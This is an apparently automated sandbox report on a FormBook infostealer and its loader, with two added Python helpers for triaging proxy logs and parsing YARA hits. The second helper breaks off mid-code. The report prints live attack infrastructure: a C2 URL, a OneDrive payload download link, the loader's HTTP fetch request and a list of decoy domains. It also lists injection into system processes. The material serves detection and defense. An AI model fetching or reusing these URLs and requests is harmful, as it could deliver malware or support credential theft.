Source: Binary string: wntdll.pdbUGP | source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

          Networking

Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
Source: Malware configuration extractor | URLs: www.rematedeldia.com/euv4/
Source: Malware configuration extractor | URLs: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 13.107.43.12
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: 0321423605241625.exe, 00000000.00000003.301183621.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307512986.0000000000868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR
Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/
Source: 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/U0
Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/_
Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/s
Source: 0321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3
Source: 0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02188CBC InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected:
  GET /y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 HTTP/1.1
  User-Agent: 92
  Host: ppqfqw.ph.files.1drv.com
  Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: 0321423605241625.exe, 00000000.00000002.306915554.00000000007CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
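Two things in this section are directly usable for network triage: the DBatLoader stage-two fetch is a plain WinINet GET to a OneDrive file host with the literal User-Agent "92" (the string handed to InternetOpenA), and the FormBook payload checks in to the single configured C2 path while the Snort alerts show the same check-in pattern hitting three different IPs, which is how FormBook's decoy list behaves. The following added example (not part of the report) classifies web-proxy log lines against those two observations. The log lines are constructed (timestamps, ports, query strings and the OneDrive path are made up), the one-request-per-line format with the quoted User-Agent last is an assumption for the example rather than a real proxy format, and FORMBOOK_CONFIG carries the report's C2 entry plus a subset of its decoy list.

```python
"""Triage constructed proxy-log lines against the report's networking findings.

Added example, not Joe Sandbox code. SAMPLE_LOG is constructed; the log
format is assumed for the example. FORMBOOK_CONFIG holds the report's C2
entry and six of its decoy domains.
"""
from __future__ import annotations

import shlex

FORMBOOK_CONFIG = {
    "C2 list": ["www.rematedeldia.com/euv4/"],
    "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com",
              "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest"],
}
FILE_HOSTING = ("onedrive.live.com", "1drv.com")

# Constructed: "<ts> <src:port> <method> <host> <path> "<user-agent>"" per line.
SAMPLE_LOG = """\
2022-11-29T18:25:40 192.168.2.5:49708 GET ppqfqw.ph.files.1drv.com /y4mEXAMPLE/Mwqrxeuzvim?download&psid=1 "92"
2022-11-29T18:26:08 192.168.2.5:49715 GET www.rematedeldia.com /euv4/?Yb3=dGVzdA&k7=Zm9v "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2022-11-29T18:26:23 192.168.2.5:49717 GET www.hagenbicycles.com /euv4/?Yb3=dGVzdA&k7=Zm9v "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2022-11-29T18:30:00 192.168.2.5:49730 GET www.hagenbicycles.com /about "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2022-11-29T18:31:00 192.168.2.5:49731 GET www.example.com / "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


def load_iocs(cfg: dict) -> tuple[set[tuple[str, str]], set[str]]:
    """Split 'host/path/' C2 entries into (host, '/path/') pairs; lower-case the decoys."""
    c2 = set()
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2.add((host.lower(), "/" + path))
    return c2, {d.lower() for d in cfg["decoy"]}


def bare_host(host: str) -> str:
    h = host.lower().split(":")[0]
    return h[4:] if h.startswith("www.") else h


def classify(host: str, path: str, user_agent: str,
             c2: set[tuple[str, str]], decoys: set[str]) -> str:
    """Return a verdict tag, or '' when the request matches nothing."""
    h = host.lower()
    if any(h == c2_host and path.startswith(c2_path) for c2_host, c2_path in c2):
        return "formbook-c2"
    # A decoy domain only counts together with the configured C2 path:
    # an ordinary visit to the same domain is not an indicator.
    if bare_host(h) in decoys and any(path.startswith(p) for _, p in c2):
        return "formbook-decoy"
    # Heuristic for the loader stage: a file-hosting download fetched by
    # something that does not even pretend to be a browser.
    if (any(h == d or h.endswith("." + d) for d in FILE_HOSTING)
            and "download" in path.lower()
            and not user_agent.startswith("Mozilla/")):
        return "loader-download"
    return ""


def triage(log_text: str) -> list[tuple[str, str]]:
    """(host, verdict) for every non-empty log line."""
    c2, decoys = load_iocs(FORMBOOK_CONFIG)
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _src, _method, host, path, user_agent = shlex.split(line)
        results.append((host, classify(host, path, user_agent, c2, decoys)))
    return results


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_LOG):
        print(f"{verdict or '-':18} {host}")
```

The decoy rule is deliberately narrow. FormBook's decoy domains are, as a rule, unrelated live sites, so a hit on one is corroboration that the client is running the payload (the three check-in IPs in the Snort table are that behaviour), not a reason to block the domain for everyone; the C2 entry is the one to block.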

          E-Banking Fraud

Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
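The rows above are a flattened two-column table: the left column names the scanned object (an unpacked PE dump such as `1.2.colorcpl.exe.10410000.3.raw.unpack`, a raw memory dump such as `00000009.00000002.…0000000002C80000.00000040.….sdmp`, or a whole process memory space with its PID) and the right column names the YARA rule that fired. The added example below is not part of the Joe Sandbox report; it is a Python helper that parses such rows, splits the dump names into process, base address and page protection, and summarises which rule hit which process, flagging hits that sit in executable memory (the `00000040` = PAGE_EXECUTE_READWRITE regions in colorcpl.exe and the other hosts are exactly where the injected FormBook payload lives). The `.sdmp` field layout used here (process index, stage, counter, base address, page protection, then three fields carried through unparsed) is an assumption inferred from the names visible on this page, not documented Joe Sandbox semantics; the four sample rows are copied from the report, one left in the fused `MEMORYMatched rule` form that text extraction produces, so the parser accepts both forms.

```python
import json
import re
from collections import defaultdict

# Windows page-protection constants (winnt.h), used to name the protection field.
PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80

# One match row: "Source: <source>, type: <TYPE> | Matched rule: <rule> <metadata>".
# The fused "MEMORYMatched rule" form left by text extraction is accepted as well.
LINE_RE = re.compile(
    r"Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)
# Unpacked PE dump: "<proc>.<stage>.<image>.<base>.<n>[.raw].unpack"
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.\d+(?:\.raw)?\.unpack$"
)
# Raw memory dump: eight dot-separated fields + ".sdmp". ASSUMED layout for this example:
# field 0 = process index, 1 = stage, 3 = region base address, 4 = page protection.
SDMP_RE = re.compile(r"^(?P<fields>[0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp$")
# Whole-process string scan: "Process Memory Space: <image> PID: <pid>"
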